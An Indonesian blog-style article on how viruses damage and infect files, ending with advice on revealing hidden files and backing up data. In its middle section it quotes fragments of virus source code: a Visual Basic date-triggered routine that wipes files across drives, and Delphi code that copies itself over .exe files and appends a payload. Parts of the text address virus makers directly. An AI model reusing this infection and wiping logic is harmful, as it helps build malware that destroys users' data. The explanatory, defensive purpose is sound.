Virus dan ulahnya di file yang terjangkit

Kebanyakan virus  melakukan penyerangan (pengerusakan) terhadap file-file komputer korbannya Serangan  virus ini  yang  sangat  ditakuti  oleh pengguna  computer.  Tetapi  jika  virus  tersebut  hanya melakukan penyebaran itu bukan masalah karena tidak melakukan pengerusakan jadi si korban tidak merasa begitu dirugikan. Lalu bentuk-bentuk serangan apa saja yang dilakukan virus pada file?

Bentuk-bentuk serangan yang dilakukan virus pada file:

1.  Menghapus,  memindahkan,  menyembunyikan  dan  mengerusak  file(harap  jangan  sampai merusak isi file karena sapa tahu file itu sangat penting mungkin file tersebut tulisan skripsi atau apalah yang tentunya begitu berarti bagi user(patuhi  saran  vm yang baik  )

2.  Infeksi  terhadap  file,  biasanya  virus  melakukan  ini  untuk  melindungi  dirinya  dengan  cara menempel dirinya pada file yang ingin di infeksi. Biasanya file*.exe, *.com,  dll.

3.  Memformat partisi dan menghapus partisi (harap bagi vm jangan lakukan ini  karena selain memusnahkan virus sendiri juga memusnahkankan data orang).

4.  Menyembunyikan folder asli lalu membuat folder palsu dengan nama yang sama tetapi folder tersebut sebenarnya adalah file virus berekstensi .exe hal ini juga dapat dilakukan pada file dengan ekstensi2 tertentu  yang diinginkan sang vm untuk dibuat file palsunya.

Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering dilakukan oleh virus untuk melakukan  manipulasi  terhadap  suatu  file  .  Menghapus,  memindahkan  dan  menyembunyikan  file merupakan hal yang sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan tehnik ini untuk melakukan manipulasi terhadap suatu file.  Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan karena teKnik ini cukup sulit dilakukan

Gambar didatas adalah source virus merdeka yang saya dapatkan dari teman saya Riyanto virus ini cukup sadis karena melakukan format pada tanggal yang sudah ditentukan oleh sang VM(17-08):

   TanggAl = Format(Now, "dd-mm")

            If TanggAl = ("17-08") Then

                GetFiles sdrive, True, "*.*"

            End If

harap bagi vm jangan lakukan ini karena selain memusnahkan virus sendiri juga memusnahkan  data orang.

Selain melakukan format virus ini juga melakukan pencemaran pada file berekstensi .exe lalu dilakukan penambahan ekstensi didepan ekstensi asli tersebut dengan ekstensi-ekstensi yang sudah didaftar oleh

VM:

Sub NyaRi()

Dim TanggAl

Dim ictr As Integer

Dim sdrive As String

  For ictr = 68 To 90

    sdrive = Chr(ictr) & ":\"

'ekstensi yang akan di tambahkan sebelum ekstensi .exe

      GetFiles sdrive, True, "*.txt"

      GetFiles sdrive, True, "*.pdf"

      GetFiles sdrive, True, "*.rtf"

            TanggAl = Format(Now, "dd-mm")

            If TanggAl = ("17-08") Then

                GetFiles sdrive, True, "*.*"

          End If

End Sub

Jadi misal Komputer telah terinfeksi virus ini lalu kita menyolokkan flashdisk yang didalamnya terdapat file misal KaHt.exe file tersebut akan di manipulasi oleh virus tersebut sehingga menjadi file peranakan virus  dengan  nama  KaHt.txt.exe  (catatan  oleh antivirus  biasanya  double  ekstensi ini  sudah  sangat dicurigai sebagai virus /FakeExtention). Ada pula virus build-an Delphi yang bisa memanipulasi file 

 Pertama lakukan prosedur pencarian file dengan ekstensi.exe

  If UpperCase(ExtractFileExt(Sr.Name)) = UpperCase('exe') Then InfeksiFile(Dir + Sr.Name);

            //cari ekstensi .exe lalu lakukan infeksi file

UpperCase = function UpperCase

berisi indentifikasi nama file yang akan di racuni

 if (Ch >= 'a') and (Ch <= 'z') then Dec(Ch, 32); //untuk membaca nama file

dimana   Ch: Char;

ExtractFileExt=function ExtractFileExt

Result := Copy(Filename, i + 1, Length(Filename)); //meng-copy dgn filename sama + size(1)

lalu lakukan infeksi file:

CopyFile(pChar(ParamStr(0)), pChar(Name), False) Then Exit;

  Settings := #00 + GenerateName + #02 + IntToStr(Length(FileBuffer)) + #01;

  AssignFile(F, Name);

  Append(F);

  Write(F, FileBuffer);

  Write(F, Settings); //tulis file f + setting (manipulasi)

  CloseFile(F);

Hasil dari infeksi file ini adalah misal computer telah terinfeksi virus ini lalu kita menyolokkan flashdisk yang  didalamnya  terdapat  file  misal  KaHt.exe  file  tersebut  akan  di  manipulasi  oleh  virus  tersebut sehingga menjadi file peranakan virus dengan nama KaHt.exe (tetapi icon file tersebut bukan ikon sebenarnya melainkan telah dirubah menjadi sama seperti  icon file induk virus,menandakan bahwa file tersebut sudah dimanipulasi oleh virus) begitulah ulah-ulah virus  pada file jadi setelah mengetahui tingkah laku virus yang sudah saya terangkan

apa anda hanya akan menjadi naive user (user awam) yang masa bodoh? Menyerahkan semuanya pada antivirus atau orang yang pinter komputer? Lalu misal data/document  di komputer/flashdisk tiba2 lenyap dimakan virus (dimakan emang laper virusnya?) lalu apa yang anda lakukan? Cek dulu benar2 di delete oleh virus atau hanya di hidden aja? Caranya klik Tool-Folder Options- View- pilih Show Hidden Files and Folders sekalian hilangkan ceklist pada Hide protected operating system files (Recommendet)- Ok .Nah keliatankan kalo Cuma dihidden yah tinggal hilangkan attribute hiddennya selesai kan?data telah kembali seperti sediakala. Namun jika data/document tersebut di delete oleh virus maka anda harus melakukan restor (restor pakai apa? Pakai software Restoration banyak kok cari sendiri yah hehehe )

Saran  saya  lakukan  back-up  atas  data-data  pribadi  anda  terutama  data-data  yang  sangat  penting ,burning,  simpan  di  flashdisk,komputer  temen  dll  jadi  klo-kalo  kena  virus  dan  data  hilang  masih mempunyai cadangannya. Jika tidak sempat di back-up saya punya trick simpan aja di internet misal di 4shared, ziddu, rapidshare,dll tapi ingat data yang penting di pack dan dilengkapi password biar aman hehehe